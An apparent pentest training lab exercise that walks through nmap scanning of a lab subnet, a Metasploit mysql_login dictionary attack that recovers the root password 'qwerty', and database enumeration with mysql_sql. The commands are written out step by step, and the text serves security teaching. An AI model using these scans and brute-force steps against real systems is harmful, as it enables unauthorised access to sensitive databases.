Module 09: Database Penetration Testing Methodology - Exercise 1: Pentesting MySQL Database

Module 09: Database Penetration Testing Methodology

Objective

The Objective of this lab is to extract database's, crack user credentials, manipulate databases and create user accounts using SQL injection technique.

Scenario

Penetration testers and advisors will mimic an assault in the same way a programmer would do to gain access to the database utilizing industry best practice strategies and our own particular extra methods, recognizing access focuses and giving direction on the best way to secure down your database in the case of a genuine assault.

A database penetration test will show if your database is appropriately outlined, designed and kept up and if it complies with industry and seller best practice.
Databases hold important business resources, for example, client's sensitive information, payment card's subtle elements, item and estimating information, employee records, outlines, blueprints, licensed innovation and supplier data. Should this information end up on the wrong hands or be traded off in different ways then you may be left confronting with money-related problems in addition to harm to your reputation

Exercise 1: Pentesting MySQL Database

Scenario

MySQL database is one of the extensively used open source databases and freely available with unrestricted redistribution, providing users with full access to the source code. The database can contain different pluggable storage engines to suit the application.
Being one of the extensively used open source databases, MySQL becomes a prime target for the attackers in order to gain access to sensitive information.
As a pentester, you need to be aware of MySQL databases and their related queries.
In this lab, you will learn to perform the following:
i. Obtain information regarding the version of MySQL
ii. Perform dictionary attack on the database server and gain access to it

Lab Duration: 20 Minutes

1. Click Kali Linux (Internal Network).
   If Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
   
2. Type root in the Username field and click Next.
   
3. Type toor in the Password field and click Sign In.
   
4. In this lab, we will be scanning a subnet for live machines; select one machine, and perform pentest on the machine to gain access to its resources.
   To perform a quick scan, we will do a ping sweep using Nmap. In this lab, we will choose an internal network (Subnet D) for pentesting.
   Launch a command line terminal, type nmap -sP 172.20.20.1-255 and press Enter.
   This displays all the hosts that are up in the network within a minute. In this lab, we will choose 172.20.20.11 (Sales Department Subnet D) as our target.
   
5. Now, we will perform an intense scan on Sales Department Subnet D machine. Type nmap -T4 -A 172.20.20.11 and press Enter. This initiates the scan as shown in the screenshot below.
   
6. Once the scan is completed, you will observe that port 3306 is open stating that MySQL Service is running on the remote machine and the version of MySQL installed is 5.1.61.
   
7. In this lab, we will be attempting a dictionary attack on MySQL login credentials using msfconsole.
   To perform this attack, type msfconsole and press Enter to launch the Metasploit Framework Console.
   
8. Since we are performing a dictionary attack on the login, we will use mysql_login scanner. To use this, type use auxiliary/scanner/mysql/mysql_login and press Enter.
   
9. Type show options and press Enter to view the options that are to be configured in the module.
   
10. Issue the following commands in msfconsole:
    
    1. set username root
    2. set rhosts 172.20.20.11
    3. set pass_file /root/Wordlists/Passwords.txt

    1. set username root : By setting the username as root, we are targeting the root user.
    2. set rhosts 172.20.20.11 : rhosts refer to the IP address of the remote machine, i.e., Sales Department Subnet D.
    3. set pass_file /root/Wordlists/Passwords.txt : We are using this file to perform the dictionary attack on the passwordfield.

    more...
    
11. Now, type run and press Enter. The auxiliary module begins the dictionary attack on the database server as shown in the screenshot below.
    
12. While trying the username 'root' against each password combination, the auxiliary module stops the scan at the combination root/qwerty, which means that the dictionary attack was successful.
    
13. Now that we cracked the user credentials, we will now use the mysql_sql auxiliary module to execute MySQL queries like extracting databases.
    Type use auxiliary/admin/mysql/mysql_sql and press Enter.
    
14. Issue the following commands in msfconsole:
    
    1. set rhost 172.20.20.11
    2. set username root
    3. set password qwerty
    4. set SQL show databases;

    1. set rhost 172.20.20.11 : rhost refers to the IP address of the remote machine, i.e., Sales Department Subnet D.
    2. set username root : We are setting the username as root
    3. set password qwerty : We are setting the password as qwerty
    4. set SQL show databases; : We are setting the module to execute the query "show databases;".

    more...
    
15. Type run and press Enter.
    The auxiliary module displays all the databases stored inside the MySQL DB server as shown in the screenshot below.
    
16. This way, you may execute other queries as well to view the information of your choice.

In this lab, you have learned how to:
i. Obtain information regarding the version of MySQL
ii. Perform dictionary attack on the database server and gain access to it